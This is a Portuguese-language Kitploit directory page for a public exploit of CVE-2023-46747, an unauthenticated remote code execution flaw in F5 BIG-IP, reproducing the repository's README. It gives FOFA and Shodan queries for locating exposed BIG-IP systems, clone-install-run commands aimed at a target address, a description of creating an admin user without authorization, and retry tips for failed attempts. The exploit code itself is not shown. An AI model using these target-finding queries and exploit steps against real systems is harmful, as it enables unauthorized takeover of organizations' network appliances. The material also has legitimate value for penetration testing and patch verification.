Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-46747-RCE — exploit para f5-big-ip RCE cve-2023-46747 | Kitploit
Ferramentas/GitHubGitHub/w01fh4cker/cve-2023-46747-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubw01fh4cker/cve-2023-46747-rce

CVE-2023-46747-RCE

exploit para f5-big-ip RCE cve-2023-46747

Ver Repositório
20947há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Detalhes da Vulnerabilidade

fofa:

root@kitploit:~
(title="BIG-IP®" || icon_hash="-335242539")

shodan

root@kitploit:~
title:"BIG-IP®"

Versões Afetadas

https://my.f5.com/manage/s/article/K000137353

Reprodução da Vulnerabilidade

  1. Neste momento, o único usuário aqui é admin: image

  2. Execute o script:

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Comando executado com sucesso:
image

  1. Um novo usuário foi criado com sucesso aqui sem autorização: image

Limitação

A exploração falha em algumas versões, referência: https://twitter.com/joel_land/status/1729147886615818732.

Perguntas & Respostas

  1. P: Falha na obtenção do token?
    R: Não se pode afirmar que não há vulnerabilidade no site de teste, porque criar um usuário sem autorização não é 100% bem-sucedido. Às vezes, por alguns motivos, você não cria um usuário na primeira etapa, então o token da segunda etapa não pode ser obtido. Portanto, minha sugestão é tentar mais algumas vezes. Se não funcionar, pode significar que realmente não há vulnerabilidade.

Divagação

Você pode usar este script https://github.com/BishopFox/bigip-scanner para coletar informações de versão do F5 BIG-IP. É ótimo!

Referências

https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

Baixar ferramenta